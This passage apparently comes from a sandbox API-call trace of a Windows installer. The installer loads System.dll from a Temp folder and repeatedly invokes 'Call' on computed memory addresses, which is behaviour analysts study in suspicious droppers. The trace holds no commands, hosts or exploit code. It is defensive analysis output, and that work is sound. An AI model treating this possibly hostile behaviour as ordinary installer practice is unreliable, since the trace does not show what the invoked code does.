param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="784") returned 3 [0158.035] lstrcpyA (in: lpString1=0x431000, lpString2="784" | out: lpString1="784") returned="784" [0158.035] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3311896") returned 7 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.035] lstrlenA (lpString="1224") returned 4 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="392", iMaxLength=1024 | out: lpString1="392") returned="392" [0158.035] lstrlenA (lpString="392") returned 3 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="784", iMaxLength=1024 | out: lpString1="784") returned="784" [0158.035] lstrlenA (lpString="784") returned 3 [0158.035] lstrcpynA (in: lpString1=0x40ac18, lpString2="784", iMaxLength=1024 | out: lpString1="784") returned="784" [0158.035] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.035] lstrcmpiA (lpString1="784", lpString2="0") returned 1 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3311896", iMaxLength=1024 | out: lpString1="3311896") returned="3311896" [0158.035] lstrlenA (lpString="3311896") returned 7 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="784", iMaxLength=1024 | out: lpString1="784") returned="784" [0158.035] lstrlenA (lpString="784") returned 3 [0158.035] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3312680") returned 7 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.035] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.035] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.035] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.035] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.036] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.036] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.036] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3312680", iMaxLength=1024 | out: lpString1="3312680") returned="3312680" [0158.036] lstrlenA (lpString="3312680") returned 7 [0158.036] lstrcpynA (in: lpString1=0x336d34, lpString2="*3312680(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3312680(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3312680(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.036] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.036] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.036] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.036] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.036] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.037] lstrcpyA (in: lpString1=0x321ba8, lpString2="3312680" | out: lpString1="3312680") returned="3312680" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.037] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="372") returned 3 [0158.038] lstrcpyA (in: lpString1=0x431800, lpString2="372" | out: lpString1="372") returned="372" [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="432") returned 3 [0158.038] lstrcpyA (in: lpString1=0x430800, lpString2="432" | out: lpString1="432") returned="432" [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="472") returned 3 [0158.038] lstrcpyA (in: lpString1=0x431000, lpString2="472" | out: lpString1="472") returned="472" [0158.038] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3312680") returned 7 [0158.038] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.038] lstrlenA (lpString="1224") returned 4 [0158.038] lstrcpynA (in: lpString1=0x42e3a0, lpString2="432", iMaxLength=1024 | out: lpString1="432") returned="432" [0158.038] lstrlenA (lpString="432") returned 3 [0158.038] lstrcpynA (in: lpString1=0x42e3a0, lpString2="472", iMaxLength=1024 | out: lpString1="472") returned="472" [0158.038] lstrlenA (lpString="472") returned 3 [0158.038] lstrcpynA (in: lpString1=0x40ac18, lpString2="472", iMaxLength=1024 | out: lpString1="472") returned="472" [0158.038] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.038] lstrcmpiA (lpString1="472", lpString2="0") returned 1 [0158.038] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3312680", iMaxLength=1024 | out: lpString1="3312680") returned="3312680" [0158.038] lstrlenA (lpString="3312680") returned 7 [0158.039] lstrcpynA (in: lpString1=0x42e3a0, lpString2="472", iMaxLength=1024 | out: lpString1="472") returned="472" [0158.039] lstrlenA (lpString="472") returned 3 [0158.039] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3313152") returned 7 [0158.039] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.039] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.039] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.039] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.039] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.039] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.039] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.040] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3313152", iMaxLength=1024 | out: lpString1="3313152") returned="3313152" [0158.040] lstrlenA (lpString="3313152") returned 7 [0158.040] lstrcpynA (in: lpString1=0x336d34, lpString2="*3313152(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3313152(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3313152(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.040] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.040] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.040] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.040] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.040] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.040] lstrcpyA (in: lpString1=0x321ba8, lpString2="3313152" | out: lpString1="3313152") returned="3313152" [0158.040] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.041] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="380") returned 3 [0158.041] lstrcpyA (in: lpString1=0x431800, lpString2="380" | out: lpString1="380") returned="380" [0158.041] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.041] lstrcpyA (in: lpString1=0x430800, lpString2="476" | out: lpString1="476") returned="476" [0158.041] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.041] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="920") returned 3 [0158.042] lstrcpyA (in: lpString1=0x431000, lpString2="920" | out: lpString1="920") returned="920" [0158.042] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3313152") returned 7 [0158.042] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.042] lstrlenA (lpString="1224") returned 4 [0158.042] lstrcpynA (in: lpString1=0x42e3a0, lpString2="476", iMaxLength=1024 | out: lpString1="476") returned="476" [0158.042] lstrlenA (lpString="476") returned 3 [0158.042] lstrcpynA (in: lpString1=0x42e3a0, lpString2="920", iMaxLength=1024 | out: lpString1="920") returned="920" [0158.042] lstrlenA (lpString="920") returned 3 [0158.042] lstrcpynA (in: lpString1=0x40ac18, lpString2="920", iMaxLength=1024 | out: lpString1="920") returned="920" [0158.042] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.042] lstrcmpiA (lpString1="920", lpString2="0") returned 1 [0158.042] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3313152", iMaxLength=1024 | out: lpString1="3313152") returned="3313152" [0158.042] lstrlenA (lpString="3313152") returned 7 [0158.042] lstrcpynA (in: lpString1=0x42e3a0, lpString2="920", iMaxLength=1024 | out: lpString1="920") returned="920" [0158.042] lstrlenA (lpString="920") returned 3 [0158.042] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3314072") returned 7 [0158.042] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.042] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.042] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.042] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.043] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.043] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.043] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.043] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3314072", iMaxLength=1024 | out: lpString1="3314072") returned="3314072" [0158.043] lstrlenA (lpString="3314072") returned 7 [0158.043] lstrcpynA (in: lpString1=0x336d34, lpString2="*3314072(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3314072(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3314072(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.043] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.043] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.043] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.043] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.044] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.044] lstrcpyA (in: lpString1=0x321ba8, lpString2="3314072" | out: lpString1="3314072") returned="3314072" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.044] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.045] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="380") returned 3 [0158.045] lstrcpyA (in: lpString1=0x431800, lpString2="380" | out: lpString1="380") returned="380" [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="484") returned 3 [0158.045] lstrcpyA (in: lpString1=0x430800, lpString2="484" | out: lpString1="484") returned="484" [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="656") returned 3 [0158.045] lstrcpyA (in: lpString1=0x431000, lpString2="656" | out: lpString1="656") returned="656" [0158.045] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3314072") returned 7 [0158.045] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.045] lstrlenA (lpString="1224") returned 4 [0158.045] lstrcpynA (in: lpString1=0x42e3a0, lpString2="484", iMaxLength=1024 | out: lpString1="484") returned="484" [0158.045] lstrlenA (lpString="484") returned 3 [0158.045] lstrcpynA (in: lpString1=0x42e3a0, lpString2="656", iMaxLength=1024 | out: lpString1="656") returned="656" [0158.045] lstrlenA (lpString="656") returned 3 [0158.045] lstrcpynA (in: lpString1=0x40ac18, lpString2="656", iMaxLength=1024 | out: lpString1="656") returned="656" [0158.045] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.045] lstrcmpiA (lpString1="656", lpString2="0") returned 1 [0158.045] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3314072", iMaxLength=1024 | out: lpString1="3314072") returned="3314072" [0158.046] lstrlenA (lpString="3314072") returned 7 [0158.046] lstrcpynA (in: lpString1=0x42e3a0, lpString2="656", iMaxLength=1024 | out: lpString1="656") returned="656" [0158.046] lstrlenA (lpString="656") returned 3 [0158.046] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3314728") returned 7 [0158.046] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.046] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.046] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.046] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.046] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.046] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.046] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.046] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3314728", iMaxLength=1024 | out: lpString1="3314728") returned="3314728" [0158.046] lstrlenA (lpString="3314728") returned 7 [0158.046] lstrcpynA (in: lpString1=0x336d34, lpString2="*3314728(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3314728(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3314728(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.046] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.046] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.046] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.047] GetModuleHandleA 